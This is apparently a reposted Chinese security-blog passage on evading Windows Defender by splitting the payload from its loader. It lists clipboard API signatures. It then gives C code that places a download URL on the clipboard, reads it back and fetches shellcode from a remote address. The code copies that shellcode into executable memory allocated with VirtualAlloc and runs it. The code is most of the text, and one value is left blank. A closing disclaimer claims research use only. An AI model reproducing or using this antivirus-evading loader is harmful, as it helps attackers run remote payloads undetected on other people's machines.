相关API:
BOOL OpenClipboard(
[in, optional] HWND hWndNewOwner //打开剪贴板以供检查,并阻止其他应用程序修改剪贴板内容。
);
HANDLE GetClipboardData(
[in] UINT uFormat //从剪贴板中检索指定格式的数据。 剪贴板之前必须已打开。
);
LPVOID GlobalLock(
[in] HGLOBAL hMem //锁定全局内存对象并返回指向对象内存块的第一个字节的指针。
);
0x03 免杀代码实现
system("echo http://192.168.183.137:81/1.txt | clip");
BOOL Cb = OpenClipboard(NULL);
HANDLE hMem = GetClipboardData(CF_TEXT);
char* url = (char*)GlobalLock(hMem);
hInternet = InternetOpenA("Mozilla/5.0 (Macintosh; Intel Mac OS X 12.1; rv:91.0) Gecko/20100101 Firefox/91.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnect = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0);
pBuf = (char*)malloc(dwBufferSize);
memset(pBuf, 0, dwBufferSize);
InternetReadFile(hConnect, pBuf, dwBufferSize, &dwRet);
InternetCloseHandle(hInternet);
InternetCloseHandle(hConnect);
char* scd = GetUrlPage(pBuf);
int shellcode_length = ; //shellcode大小
void* exec = VirtualAlloc(0, shellcode_length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, scd, shellcode_length);
GlobalUnlock(hMem);
CloseClipboard();
((void(*)())exec)();
原文始发于微信公众号(安全天书):【免杀思路】不一样的分离bypassDefender
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论